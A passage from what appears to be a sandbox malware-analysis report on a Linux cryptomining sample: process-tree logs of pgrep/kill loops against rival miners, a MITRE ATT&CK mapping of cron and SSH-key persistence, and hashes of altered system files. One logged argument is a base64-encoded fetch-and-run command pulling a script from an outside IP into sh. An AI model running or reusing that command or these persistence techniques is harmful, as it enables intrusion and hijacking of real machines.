  xargs -I "%" kill -9 "%"
  2⤵
  PID:2517
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  - Reads CPU attributes
  PID:2516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2519
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  PID:2518
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2521
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  - Reads runtime system information
  PID:2520
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2523
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:2522
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2525
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  PID:2524
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2527
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  PID:2526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2529
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  - Reads CPU attributes
  PID:2528
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2531
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  PID:2530
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2533
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  - Reads CPU attributes
  PID:2532
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2535
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  - Reads runtime system information
  PID:2534
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2537
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  PID:2536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2539
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:2538
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2541
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  PID:2540
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2543
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2542
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2545
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  PID:2544
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2547

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ps

Filesize
13B

MD5
3d47b8e895a71930bda5d4f3d8fc8589

SHA1
efbaf468b81abb6b465ca12f35fa067bae1b4f10

SHA256
be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36

SHA512
bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb

Download Submit
/bin/ps

Filesize
52B

MD5
f668da8f0525cbe5a545869cb5776913

SHA1
996e6afed4498ff8a92a64330de018141af102c9

SHA256
db7a08cba996d62b1fe07727ba58b98d7b59778bd7227c9b7fd69bc587d2557f

SHA512
f918ba58e9af19704344c92ec356d215080f47d66b175f3d712d31e54e1b9e4e46daeb0556d82b0722ae01b8cfe456f08021e73b053ced6326735e1d0b73c700

Download Submit
/bin/pstree

Filesize
56B

MD5
896f6d504f181bd883a90b84069bcf70

SHA1
86fd682d1932d9e14461796e5f0fe776b8ce9d5c

SHA256
b6eec955fd5b0e9ddf43ef55b7fe74075cc1a935ab896d5cd0a55429ef0d6d25

SHA512
1f705ceead76868a79abb7ea42efad35e37b95421bfc81ce4540e4beeb7cbc0ccadfaae85794b6945c93304da9948d9d63504f9377ca3e92b874cc3f691d3c1a

Download Submit
/bin/top

Filesize
53B

MD5
6956a4d6a2444151c11a73517215cb34

SHA1
b279ad496f640f44418aa7e5e27a4d458bddb7fb

SHA256
561941bdd6305a389e688a1214acd9163478301738158f13349ea403dfae300c

SHA512
ee1a27243159cf9aa99ed0ff79ae1f6d66c698f668e0c233544f1a79aab5bb8ca6edb051d907aef8b50ff85f39aa41b21e951476c3a53b6a85a7a06adc28ed8d

Download Submit
/etc/cron.d/zzh

Filesize
53B

MD5
89e54ac293f5d8687ddd68f3d0574a53

SHA1
2353118da29faab45571118fee232a8ca9d5f818

SHA256
6799c463b1bec4784078ec31bd11a43609dafcc6cfc58ecb16819e1fd55219a3

SHA512
87ed4b3def516fce45ba5aab199b9ed9850f70d383284945445077d71a778c5c01519f45e992d8cf171594d88dd7a241d52b82548668372fb569c4b325a680fc

Download Submit
/etc/crontab

Filesize
50B

MD5
b2ecca8d419b5c3fa2ee7621efa75eb7

SHA1
3adc58bd314dea94eebfd1582ffc8bbbb5cfb34e

SHA256
e15357c9d6df46a6b43036e8f646311f88019e587b8d55a8aecfa438cd971545

SHA512
c6a7d05b7f615de3946055be8a4995c0fb8c670fe53c8a8dcba98f32c2ec4cb92a93524aebaca97c9b6e8696b71bdc2114d6ec303bff4ec288745bae15522e69

Download Submit
/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/etc/zzhs

Filesize
9B

MD5
970d39f8690eff0fe573e7bcf51bda9b

SHA1
46f8f835d3d3d41f063d0e8346260bb622b01a3f

SHA256
7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5

SHA512
24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

Download Submit
/root/.ssh/authorized_keys

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
/root/.ssh/authorized_keys

Filesize
399B

MD5
3d5c3dc8af5c58f2196d3230dc2e49fb

SHA1
e3ab4d81f3c4275d59ae9304612bc0b739af0f26

SHA256
a880448cdde610e7f9d700ff33084fb7e0ce053a49098d450bee44c4a08fe181

SHA512
ca408a3a8e3d77c247ddfcd2f88e3b20c21187aafe6a605059eabbfd9c3a296ec5d9949166e78a76689716e814de3197eb519e76e8ba9fa8e5992f1a7f13f8cb

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads